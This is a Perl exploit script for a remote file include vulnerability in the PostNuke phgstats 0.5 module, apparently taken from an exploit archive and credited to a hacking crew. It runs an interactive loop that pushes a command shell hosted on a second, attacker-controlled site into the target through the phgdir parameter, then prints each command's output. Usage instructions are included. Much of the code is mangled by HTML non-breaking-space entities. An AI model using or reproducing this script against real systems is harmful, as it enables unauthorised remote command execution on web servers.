PostNuke Module phgstats 0.5 (phgdir) Remote File Include Exploit

                                                #PostNuke Module phgstats 0.5 (phgdir) Remote File Include Exploit
#
#Vendor: http://kent.dl.sourceforge.net/sourceforge/phgstats/phgstats_0.5.zip
#
#Vulnerable Code: include_once($phgdir . \'settings/config.inc.php\');
#
#Coded by bd0rk || SOH-Crew
#
#Usage: expl.pl [target] [cmd shell] [shell variable]
#
#Greetings: str0ke, TheJT, MereX, drummonster(laptop)
#
# Fixtip: Declare $phgdir or use hacking attempt
#

use LWP::UserAgent;

$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];

if($Path!~/http:/// || $Pathtocmd!~/http:/// || !$cmdv){usage()}

head();

while()
{
       print \"[shell] $\";
while(<STDIN>)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$cmd=$_;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;chomp($cmd);

$xpl&nbsp;=&nbsp;LWP::UserAgent->new()&nbsp;or&nbsp;die;
$req&nbsp;=&nbsp;HTTP::Request->new(GET&nbsp;=>$Path.\'main/phgstats.inc.php?phgdir=\'.$Pathtocmd.\'?&\'.$cmdv.\'=\'.$cmd)or&nbsp;die&nbsp;\"
Could&nbsp;Not&nbsp;connect
\";

$res&nbsp;=&nbsp;$xpl->request($req);
$return&nbsp;=&nbsp;$res->content;
$return&nbsp;=~&nbsp;tr/[
]/[....]/;

if&nbsp;(!$cmd)&nbsp;{print&nbsp;\"
Please&nbsp;Enter&nbsp;a&nbsp;Command

\";&nbsp;$return&nbsp;=\"\";}

elsif&nbsp;($return&nbsp;=~/failed&nbsp;to&nbsp;open&nbsp;stream:&nbsp;HTTP&nbsp;request&nbsp;failed!/&nbsp;||&nbsp;$return&nbsp;=~/:&nbsp;Cannot&nbsp;execute&nbsp;a&nbsp;blank&nbsp;command&nbsp;in&nbsp;<b>/)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{print&nbsp;\"
Could&nbsp;Not&nbsp;Connect&nbsp;to&nbsp;cmd&nbsp;Host&nbsp;or&nbsp;Invalid&nbsp;Command&nbsp;Variable
\";exit}
elsif&nbsp;($return&nbsp;=~/^<br./>.<b>Fatal.error/)&nbsp;{print&nbsp;\"
Invalid&nbsp;Command&nbsp;or&nbsp;No&nbsp;Return

\"}

if($return&nbsp;=~&nbsp;/(.*)/)


{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$finreturn&nbsp;=&nbsp;$1;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$finreturn=~&nbsp;tr/[....]/[
]/;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print&nbsp;\"
$finreturn

\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;last;
}

else&nbsp;{print&nbsp;\"[shell]&nbsp;$\";}}}last;

sub&nbsp;head()
&nbsp;{
&nbsp;print&nbsp;\"
============================================================================
\";
&nbsp;print&nbsp;\"&nbsp;*PostNuke&nbsp;Module&nbsp;phgstats&nbsp;0.5&nbsp;(phgdir)&nbsp;Remote&nbsp;File&nbsp;Include&nbsp;Exploit*
\";
&nbsp;print&nbsp;\"============================================================================
\";
&nbsp;}
sub&nbsp;usage()
&nbsp;{
&nbsp;head();
&nbsp;print&nbsp;\"&nbsp;Usage:&nbsp;expl.pl&nbsp;[target]&nbsp;[cmd&nbsp;shell&nbsp;location]&nbsp;[cmd&nbsp;shell&nbsp;variable]

\";
&nbsp;print&nbsp;\"&nbsp;<Site>&nbsp;-&nbsp;Full&nbsp;path&nbsp;to&nbsp;phgstats&nbsp;ex:&nbsp;http://www.site.com/&nbsp;
\";
&nbsp;print&nbsp;\"&nbsp;<cmd&nbsp;shell>&nbsp;-&nbsp;Path&nbsp;to&nbsp;cmd&nbsp;Shell&nbsp;e.g&nbsp;http://www.different-site.com/cmd.txt&nbsp;
\";
&nbsp;print&nbsp;\"&nbsp;<cmd&nbsp;variable>&nbsp;-&nbsp;Command&nbsp;variable&nbsp;used&nbsp;in&nbsp;php&nbsp;shell&nbsp;
\";
&nbsp;print&nbsp;\"============================================================================
\";
&nbsp;print&nbsp;\"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Bug&nbsp;Found&nbsp;by&nbsp;bd0rk&nbsp;
\";
&nbsp;print&nbsp;\"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;www.soh-crew.it.tt&nbsp;
\";
&nbsp;print&nbsp;\"============================================================================
\";
&nbsp;exit();
&nbsp;}

&nbsp;